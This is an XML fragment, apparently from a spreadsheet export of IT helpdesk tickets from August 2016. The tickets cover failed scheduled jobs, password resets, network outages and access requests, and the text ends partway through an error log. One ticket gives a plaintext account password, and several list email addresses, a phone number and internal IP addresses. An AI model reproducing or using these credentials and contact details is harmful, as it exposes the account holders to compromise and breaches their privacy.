  <r>
    <s v="reboot tax_interface dev servers HostName_972 and HostName_971 at  8/7/2016 1:00 am "/>
    <s v="reboot tax_interface dev servers HostName_972 and HostName_971 at  8/7/2016 1:00 am "/>
    <s v="uvrbhlnt bjrmalzi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1315"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1315 at 08/07/16 00:38:26"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="8"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: bk_hana_SID_22_erp_wly_dp"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: bk_hana_SID_22_erp_wly_dp at 08/07/16 00:31:26"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1383"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1383 at 08/07/16 00:23:25"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="8"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1142"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1142 at 08/07/16 00:08:26"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="8"/>
  </r>
  <r>
    <s v="abend batch  SID_51stat"/>
    <s v="job name: SID_51stat."/>
    <s v="uvrbhlnt bjrmalzi"/>
    <x v="46"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: SID_51_start_hana_slt"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: SID_51_start_hana_slt at 08/06/16 23:31:27"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="46"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: SID_43cold"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: SID_43cold at 08/06/16 23:17:27"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="4"/>
  </r>
  <r>
    <s v="recall: re:chg1144575 - approve"/>
    <s v="_x000d__x000a__x000d__x000a_received from: vkezwolt.fgnqzeai@gmail.com_x000d__x000a__x000d__x000a_vkezwolt fgnqzeai would like to recall the message, &quot;re:chg1144575 - approve&quot;._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="vkezwolt fgnqzeai"/>
    <x v="25"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: SID_51start"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: SID_51start at 08/06/16 22:56:25"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="46"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: SID_46cold"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: SID_46cold at 08/06/16 22:29:25"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="4"/>
  </r>
  <r>
    <s v="erp SID_34 is not available"/>
    <s v="i connected through vpn to look up information and erp will not connect. i was able to connect to our local drive plant_101 departments drive but not erp."/>
    <s v="naecuhxz hdrqvume"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: SID_47cold"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: SID_47cold at 08/06/16 20:26:24"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="4"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: SID_27hot"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: SID_27hot at 08/06/16 20:21:25"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="4"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: SID_51cold"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: SID_51cold at 08/06/16 20:15:25"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="4"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: SID_79cold"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: SID_79cold at 08/06/16 20:10:24"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="4"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: SID_35cold"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: SID_35cold at 08/06/16 19:55:25"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_3032"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_3032 at 08/06/16 19:09:25"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="5"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: SID_51stop"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: SID_51stop at 08/06/16 18:14:25"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="13"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1665"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1665 at 08/06/16 18:06:25"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="5"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: SID_51_stop_hana_slt"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: SID_51_stop_hana_slt at 08/06/16 17:50:24"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="13"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1428"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1428 at 08/06/16 12:01:26"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="5"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_2078"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_2078 at 08/06/16 10:11:26"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="5"/>
  </r>
  <r>
    <s v="erp is locked out need to unlock it"/>
    <s v="erp is locked out need to unlock it"/>
    <s v="frbxjdti lhkofcvs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="a recently created variable fails to get opened in bobj analyser due to attached error message"/>
    <s v="a recently created variable fails to get opened in bobj analyser due to attached error message"/>
    <s v="nqlertog bshidqox"/>
    <x v="18"/>
  </r>
  <r>
    <s v="vmax disk failed?on df-6a-d-0 is failed"/>
    <s v="reporting_tool alert:the monitor is the disk failed? on df-6a-d-0/000192604484/localhost is outside expected limits (true = true)"/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: bkwin_HostName_768_inc"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: bkwin_HostName_768_inc at 08/06/16 07:46:25"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="network outage: sao pollaurido-mercedes benz plant network is down since 6:45am et on 08/06/16. no backup circuit"/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _________6:45am on 08/06/16_____________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? ___no____    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? ___no____    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000d__x000a__x000d__x000a_5. does site have a backup circuit ?  __no____    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   ___na_____     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   _____na______   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    _____no______    (yes/no/na) _x000d__x000a__x000d__x000a_10. verified site working on backup circuit ?  ___na____     (yes/no/na) _x000d__x000a__x000d__x000a_11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    ___________global_telecom_1 #331206737 ______________       _x000d__x000a__x000d__x000a_12. notified  gsc  ________     (yes/no/na)    cert started  ?________    (yes/no/na) _x000d__x000a__x000d__x000a_13.  additional diagnostics"/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="7"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: apo_cif_pds5_am"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: apo_cif_pds5_am at 08/06/16 07:17:25"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="5"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: apo_cif_pds5_eu"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: apo_cif_pds5_eu at 08/06/16 07:16:25"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="5"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1319"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1319 at 08/06/16 01:37:24"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="8"/>
  </r>
  <r>
    <s v="issue with downloading mail"/>
    <s v="_x000d__x000a__x000d__x000a_received from: dwujlnhs.ecxvrpyl@gmail.com_x000d__x000a__x000d__x000a_dear sir_x000d__x000a__x000d__x000a_i am unable to download my mails out of india office, even if i am connected with internet._x000d__x000a_kindly help in resolving the issue._x000d__x000a__x000d__x000a_best "/>
    <s v="dwujlnhs ecxvrpyl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1141"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1141 at 08/05/16 23:45:28"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="8"/>
  </r>
  <r>
    <s v="designation change required in outlook."/>
    <s v="_x000d__x000a_-------- original message --------_x000d__x000a_from: bvlcarfe aztlkeifowndararajan &lt;bvlcarfe.aztlkeif@gmail.com&gt; _x000d__x000a_date: 06/08/2016 07:21 (gmt+05:30) _x000d__x000a_to: sridthshar herytur &lt;antigvjx.zekluqim@gmail.com&gt; _x000d__x000a_subject: gopi - designation change required in outlook. _x000d__x000a__x000d__x000a_dear sir,_x000d__x000a_ _x000d__x000a_recently i have been elevated as area manager â€“ sales from assistant manager â€“ sales._x000d__x000a_ _x000d__x000a_kindly help me out to make the change in outlook contact details and collaboration_platform contact details._x000d__x000a_ _x000d__x000a_"/>
    <s v="bvlcarfe aztlkeif"/>
    <x v="19"/>
  </r>
  <r>
    <s v="HostName_111 : average disk free on e:\ is now 10%, out of total size 750.0 gb"/>
    <s v="noticed the alarm in reporting_tool ._x000d__x000a_which is below the warning threshold (15%) ._x000d__x000a_need to check ."/>
    <s v="uxgrdjfc kqxdjeov"/>
    <x v="7"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: bk_hana_SID_62_erp_dly_dp"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: bk_hana_SID_62_erp_dly_dp at 08/05/16 22:03:24"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="inquiry on transfer of contacts from phone to system"/>
    <s v="inquiry on transfer of contacts from phone to system"/>
    <s v="kuqmoaht uwsflbmo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp password reset"/>
    <s v="erp password reset"/>
    <s v="buehfyzp ygotimeu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp crm password reset"/>
    <s v="erp crm password reset"/>
    <s v="wrqxmfan fsizndjb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need password reset"/>
    <s v="need password reset"/>
    <s v="wvrgfdey ybfrlkvo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="kirty india-two switches are down at 8:57 pm et on 08/05"/>
    <s v="kirty india-two switches are down  at 8:57 pm et on 08/05"/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="7"/>
  </r>
  <r>
    <s v="inquiry about lotus notes"/>
    <s v="inquiry about lotus notes"/>
    <s v="grbkswuj outkgeya"/>
    <x v="0"/>
  </r>
  <r>
    <s v="network outage : company-ap-chn-apac-company-2960-access-sw03 &amp; sw04 are down at 7:07 pm et on 08/05."/>
    <s v="apac : company-ap-chn-apac-company-2960-access-sw03 &amp; sw04 are down at 7:07 pm et on 08/05."/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="7"/>
  </r>
  <r>
    <s v="apac-: robot HostName_17 is inactive"/>
    <s v="apac: - robot HostName_17 is inactive"/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="7"/>
  </r>
  <r>
    <s v="password change"/>
    <s v="_x000d__x000a__x000d__x000a_received from: orjcgtyz.worylufs@gmail.com_x000d__x000a__x000d__x000a_i changed my password  today but not all access locations were updated.  need to update all sites._x000d__x000a__x000d__x000a_"/>
    <s v="orjcgtyz worylufs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for xuqvaobxuy ntqkuocz using password_management_tool password reset."/>
    <s v="change to new password: alabama4$"/>
    <s v="kilrghwc ykjrbivs"/>
    <x v="16"/>
  </r>
  <r>
    <s v="update on inplant_848069"/>
    <s v="update on inplant_848069"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="hello.  please see the highlighted field below, &quot;tax code&quot;.  this field is auto-populating and is inconsistent"/>
    <s v="from: rushethryli h jacfgtykson [mailto:ckflmqoj.fojkrlmw@gmail.com] _x000a_sent: saturday, august 06, 2016 2:29 am_x000a_to: nwfodmhc exurcwkm_x000a_subject: po tax code field auto-populate_x000a__x000a_hello.  please see the highlighted field below, &quot;tax code&quot;.  this field is auto-populating and is inconsistent. _x000a__x000a_is it possible to prevent from auto-populating?  where do the po's pull this information from?  _x000a__x000a_"/>
    <s v="ckflmqoj fojkrlmw"/>
    <x v="29"/>
  </r>
  <r>
    <s v="unable to connect to wireless"/>
    <s v="unable to connect to wireless"/>
    <s v="olzsuean sojwhbrv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="can you look and see why this received on line 20 and not line 10."/>
    <s v="from: efgoawct vwniefok _x000d__x000a_sent: saturday, august 06, 2016 12:08 am_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_cc: smxoklny hbecskgl_x000d__x000a_subject: rak: can you look at this i tried to receive line10 only and it received the 90kg on line 20_x000d__x000a__x000d__x000a_can you look and see why this received on line 20 and not line 10._x000d__x000a__x000d__x000a_from: efgoawct vwniefok _x000d__x000a_sent: friday, august 05, 2016 1:34 pm_x000d__x000a_to: smxoklny hbecskgl_x000d__x000a_subject: can you look at this i tried to receive line10 only and it received the 90kg on line 20_x000d__x000a__x000d__x000a_"/>
    <s v="efgoawct vwniefok"/>
    <x v="17"/>
  </r>
  <r>
    <s v="unlock account  email  in cell phone the users"/>
    <s v="hello team,_x000a__x000a_could you please unlock account  emails in cell phone the all users below:_x000a__x000a_gifpuwtb aykegsvr- id: bigrtdfatta (kelli.bigrtdfatta@company)_x000a_jlzsardp kumtcnwi- id: bactelephony_softwarea (jlzsardp.kumtcnwi@gmail.com)_x000a_sbinuxja vtbegcho - id: nicolmghyu (sbinuxja.vtbegcho@gmail.com)_x000a_rudfgbens rtwjunior: juniowsrr (glzshbja.aoehpltm@gmail.com)_x000a_jgnxyahz cixzwuyf - id: zigioachstyac (jgnxyahz.cixzwuyf@gmail.com)_x000a_alexansxcddre olovxcdeira: olivesadia2 (qbtvmhau.zowemnca@gmail.com)_x000a_pollaurido robhyertyjo- id: robsdgerp (writfxsq.nwmaxpts@gmail.com)_x000a__x000a_note: changed the cell phones the user to a new._x000a__x000a_a wifi and data plan from your service provider is required to setup email on your mobile device._x000a__x000a_is this device company owned?  y_x000a__x000a_is this a replacement of your old device?  y_x000a__x000a_if yes, please ensure company data has been removed from the old device (delete exchange setup from settings&gt; mail, contacts, calendar)._x000a_ _x000a_for a personal device, please attach approval form signed by manager to the ticketing_tool ticket. _x000a__x000a_please ensure the device is company approved for email setup. _x000a__x000a_if it is not a company approved device please contact the gsc._x000a__x000a_for help with exchange setup on a personal device, please contact the device vendor.  you may also refer to the faq section for steps._x000a_ _x000a_has the exchange setup been completed on your device?  y/n (you will receive an email stating the device has been quarantined when this is completed). this step needs to be completed for your device to register with company._x000a__x000a__x000a_"/>
    <s v="qasdhyzm yuglsrwx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_1015: average (4 samples) disk free on c:\ is now 15%, which is below the warning threshold (15%) "/>
    <s v="HostName_1015: average (4 samples) disk free on c:\ is now 15%, which is below the warning threshold (15%) out of total size 100.5 gb"/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="11"/>
  </r>
  <r>
    <s v="help with mss worklist since manager left company"/>
    <s v="from: qekdgaim wagshrzl _x000d__x000a_sent: saturday, august 06, 2016 1:37 am_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_subject: amar help with mss worklist since manager left company_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_i'm writing on behalf of jdlxkygf wlzqaivr and mikhghytr ramdntysey. _x000d__x000a__x000d__x000a_1.       jdlxkygf wlzqaivr: davidthd's former manager (and expense report approver), gergrythg bigleman, is no longer with the company. davidthd has an expense report in gergrythg's queue. _x000d__x000a_2.       how does mikhghytr ramdntysey get access to that to approve and/or forward to the correct manager? _x000d__x000a_3.       how can we ensure there are no other requests in gergrythg's universal worklist? _x000d__x000a__x000d__x000a_note: our office will be closed, monday, september 5, 2016 for the labor day holiday._x000d__x000a__x000d__x000a_best "/>
    <s v="qekdgaim wagshrzl"/>
    <x v="51"/>
  </r>
  <r>
    <s v="folder access \\HostName_29\kt-transition\infrastructure\security operations pragtyhusas"/>
    <s v="provide access to hnynhsth jsuyhwssad (user id: pragtyhusas) to the below network folder._x000a__x000a_folder access \\HostName_29\kt-transition\infrastructure\security operations"/>
    <s v="bxspwfyo vzystwor"/>
    <x v="11"/>
  </r>
  <r>
    <s v="unable to start dell 7350"/>
    <s v="unable to start dell 7350 // stuck on welcome screen"/>
    <s v="jmxrabzy dpyvjcxr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_37 bex password "/>
    <s v="erp SID_37 bex password "/>
    <s v="fybwjzhx ojgrpafb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="update contact number 330-328-8431 in ad"/>
    <s v="update contact number 330 in ad"/>
    <s v="wszbxlpu dsujiozp"/>
    <x v="33"/>
  </r>
  <r>
    <s v="crm configuration issue"/>
    <s v="crm configuration issue"/>
    <s v="awpcmsey ctdiuqwe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blank call // loud noise"/>
    <s v="blank call // loud noise"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for jrigdbox bgyluoqn using password_management_tool password reset."/>
    <s v="please reset erp password for beahleb......"/>
    <s v="dpuifqeo eglwsfkn"/>
    <x v="16"/>
  </r>
  <r>
    <s v="access SID_1 system -erp machine service tag gowzv12- asset tag 404766"/>
    <s v="SID_1 model is not working in machine service tag gowzv12- asset tag 404766  - error attached _x000d__x000a_need to produce some uacyltoe hxgayczes in SID_1 enviroment "/>
    <s v="jaeuqbvt orlhenfj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="updated passwords and email on mobile device "/>
    <s v="updated passwords and email on mobile device "/>
    <s v="xpugzdvk xiawvmfp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password_management_tool password manager password reset link"/>
    <s v="password_management_tool password manager password reset link"/>
    <s v="xpugzdvk xiawvmfp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="bex report"/>
    <s v="_x000d__x000a__x000d__x000a_received from: nealxjbc.owjduxai@gmail.com_x000d__x000a__x000d__x000a_i'm getting an error when i'm trying to run my bex report it won't allow me to log in to SID_37.  this is something i have run with no issues in the past.  i need this to run my daily reports._x000d__x000a__x000d__x000a_"/>
    <s v="nealxjbc owjduxai"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to ethics"/>
    <s v="unable to login to ethics"/>
    <s v="vafjkslx ujancvlm"/>
    <x v="23"/>
  </r>
  <r>
    <s v="expense account will not post"/>
    <s v="my cost center changed on 7/1/2016 from ltm013 to ltm001.  i started an expense account for july, changed the cost assignment to ltm001, but the expense account will still not submit.  i receive this error message whenever i try to submit the expense account: &quot;cost center 1company/ltm013 blocked against direct postings on 7/5/2016&quot;.  "/>
    <s v="clgfntoe rhtmnzsk"/>
    <x v="9"/>
  </r>
  <r>
    <s v="access to engineering tool"/>
    <s v="name:gncpezhx hopqcvza_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:uwiqchfp.hnsukjma@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:tool access report"/>
    <s v="uwiqchfp hnsukjma"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_3194"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_3194 at 08/05/16 14:16:27"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="9"/>
  </r>
  <r>
    <s v="screensaver of company center"/>
    <s v="screensaver of company center"/>
    <s v="rvgykdzc defzmail"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1390"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1390 at 08/05/16 14:08:26"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="8"/>
  </r>
  <r>
    <s v="company screen saver was changed to company screen saver"/>
    <s v="company screen saver was changed to company screen saver during the last it update on my pc.  please change back to company and fix the programdnty so all company screen savers don't get changed!"/>
    <s v="zdnqowag cdtyonhw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="infoblox at chicago office, 10.20.198.9 has stopped issuing ip addresses"/>
    <s v="it is also beeping and the led is flashing."/>
    <s v="zcdirjeq azokfsdi"/>
    <x v="3"/>
  </r>
  <r>
    <s v="vitalyst icon to desktop"/>
    <s v="hello helpdesk, _x000d__x000a__x000d__x000a_can you help myhzrtsi rwnhqiyv to download the vitalyst icon to his desktop please. _x000d__x000a__x000d__x000a_"/>
    <s v="ugephfta hrbqkvij"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook keeps prompting for password"/>
    <s v="_x000a__x000a_outlook keeps prompting for password"/>
    <s v="xjzcbgnp vfkwscao"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to collaboration_platform"/>
    <s v="unable to login to collaboration_platform"/>
    <s v="kzeqbica kzcjeiyd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need to know if 54.87.86.150 is able to send smtp via 10.32.1.100"/>
    <s v="_x000d__x000a__x000d__x000a_received from: mfyivqes.cpihaxbs@gmail.com_x000d__x000a__x000d__x000a_please could someone check if 54.87.86.150 is allowed to send smtp via 10.32.1.100_x000d__x000a_we need to have this possibility to send out inwarehouse_tool approvals via mail._x000d__x000a__x000d__x000a_this functionality works in the past, and it's very important for our finance department._x000d__x000a_please let me know why this has been stopped_x000d__x000a__x000d__x000a_"/>
    <s v="mfyivqes cpihaxbs"/>
    <x v="26"/>
  </r>
  <r>
    <s v="unlock account  email  in cell phone the user urgapyzt tnxiuramdnty id: vaghyliort "/>
    <s v="hello team,_x000a__x000a_could you please unlock account  email  in cell phone the user urgapyzt tnxiuramdnty id: vaghyliort _x000a__x000a_"/>
    <s v="qasdhyzm yuglsrwx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blank call // loud noise "/>
    <s v="blank call // loud noise "/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked"/>
    <s v="account locked"/>
    <s v="xpugzdvk xiawvmfp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="update of ae to bw and hana"/>
    <s v="wesley tomlin &lt;xvmjocfn.bqxcdfiz@gmail.com&gt;; wilsfgtjl2_x000a_verboncouer, markhty a ???? verboma current manager - tgewaniq yepifgbl. does this need a change in mapping?  - chefgtnp2_x000a_mason, bengtjamin ??? masonb current manager - tgewaniq yepifgbl. does this need a change in mapping? - chefgtnp2_x000a_"/>
    <s v="sholvcmf bjtpomrl"/>
    <x v="8"/>
  </r>
  <r>
    <s v="update of ae to bw and hana"/>
    <s v="_x000a_mys, ptmjvysi vkrepcybwa - please confirm to change to itslpwra vybdkuoa - wilsfgtjl2_x000a_mikhghytr rushethryli &lt;trmhfxoz.bxofhryg@gmail.com&gt;; wilsfgtjl2_x000a_talryhtir, michghytuael ??? tayloml current manager - andrdgrtew c mohnrysu. does this need a change in mapping? - mondhrbaz_x000a_"/>
    <s v="sholvcmf bjtpomrl"/>
    <x v="8"/>
  </r>
  <r>
    <s v="update of ae to bw and hana "/>
    <s v="wiksufty, jimdghty l manager â€“ so i believe this user id does not need changes - zazrtulds_x000a_carmer, craigfgh cardfrmeca â€“ please confirm to change to itslpwra vybdkuoa - wilsfgtjl2_x000a_povich, trtgoy ??? mgr - povictcfgt current manager - andrdgrtew c mohnrysu. does this need a change in mapping? - mondhrbaz_x000a_ mohnrysu, andrdgrtew ??? current manager - johthryu c marftgytin. does this need a change in mapping? - magtyrtijc"/>
    <s v="sholvcmf bjtpomrl"/>
    <x v="8"/>
  </r>
  <r>
    <s v="request to reset microsoft online services password for kzeqbica.kzcjeiyd@gmail.com"/>
    <s v="from: microsoft on behalf of company inc. [mailto:msonlineservicesteam@microsoftonline.com] _x000a_sent: friday, august 05, 2016 8:43 pm_x000a_to: nwfodmhc exurcwkm_x000a_cc: tiyhum kuyiomar_x000a_subject: amar request to reset microsoft online services password for kzeqbica.kzcjeiyd@gmail.com_x000a_importance: high_x000a__x000a_    request to reset user's password   _x000a_   the following user in your organization has requested a password reset be performed for their account: _x000a__x000a_â€¢ kzeqbica.kzcjeiyd@gmail.com _x000a_â€¢ first name: santrhyat _x000a_â€¢ last name: jagthyin _x000a__x000a_consider contacting this user to validate this request is authentic before continuing. _x000a__x000a_if you have determined that this is a valid request, use your service's admin portal (office 365, windows intune, windows azure, etc.) to reset the password for this user. _x000a__x000a_want to let you users reset their own passwords? check out how you can enable password reset for users in your organization with just a few clicks. _x000a__x000a_sincerely, _x000a_company inc. _x000a__x000a_         _x000a_   this message was sent from an unmonitored email address. please do not reply to this message. _x000a_  _x000a__x000a_   _x000a_ _x000a__x000a_"/>
    <s v="kzeqbica kzcjeiyd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="xwlcqfsr lbcqfnie not able to open purchasing."/>
    <s v="xwlcqfsr lbcqfnie - xwlcqfsr.lbcqfnie@gmail.com, phone: 603.  having a problem with purchasing access.  email attached addressing the issue. please contract keith to resolve.  "/>
    <s v="xwlcqfsr lbcqfnie"/>
    <x v="0"/>
  </r>
  <r>
    <s v="locked out on the caas application"/>
    <s v="locked out on the caas application"/>
    <s v="ethwnzfb roqytnjk"/>
    <x v="6"/>
  </r>
  <r>
    <s v="insert option not wrking in excel"/>
    <s v="insert option not working in excel."/>
    <s v="sabufdcz rbkvlhpo"/>
    <x v="2"/>
  </r>
  <r>
    <s v="vlinspectkiosk2 qlhmawgi sgwipoxn locked"/>
    <s v="vlinspectkiosk2 qlhmawgi sgwipoxn locked"/>
    <s v="pmqansex nvihmbwc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cant access to network drive"/>
    <s v="cant access to network drive"/>
    <s v="gbwviklo ukwijqtm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please turn off eligibility for ethics for user wqinjkxs azoyklqe "/>
    <s v="please turn off eligibility for ethics for user wqinjkxs azoyklqe "/>
    <s v="crkdjbot qiztrxne"/>
    <x v="23"/>
  </r>
  <r>
    <s v="ecc qa - peer certificate rejected by chainverifier"/>
    <s v="just found out that the eccqa certificate is not valid. below is the error we got when talking to one of the apis on ecc qa._x000d__x000a__x000d__x000a_[build#:5.0.c.07][http worker [@316135430]][com.bridgex.connect.foundation.businesslogic.custom.exception.cust360businesslogicexception.&lt;init&gt;(14)], exception_x000d__x000a_error message: error while silently connecting: org.w3c.www.protocol.http.httpexception: peer certificate rejected by chainverifier_x000d__x000a_detailed error message: error while silently connecting: org.w3c.www.protocol.http.httpexception: peer certificate rejected by chainverifier_x000d__x000a_web service: _x000d__x000a_input paramdntys: _x000d__x000a_ property : class value : class com.company.connect.b2b.dataconnectors.io.customer.customersearchinputtype_x000d__x000a_ property : commoninput value : commoninputs [brand=kd, distchannel=, division=, language=e, maxrows=100, salesorg=, soldto=]_x000d__x000a_ property : customerattributes value : [customerattributes [attributecode=, attributetext=, attributetype=]]_x000d__x000a_ property : customersearch value : customersearch [customeraddress=customeraddress [city=, country=, countrylong=, district=, email=, fax=, houseno=, name2=, name3=, name4=, state=, statelong=, street=, street2=, telephone=, zipcode=], customername1=, customername2=, customerno=81889987, customertype=]_x000d__x000a_ property : partnerrole value : []_x000d__x000a_webserviceclient : execute() : generirtc 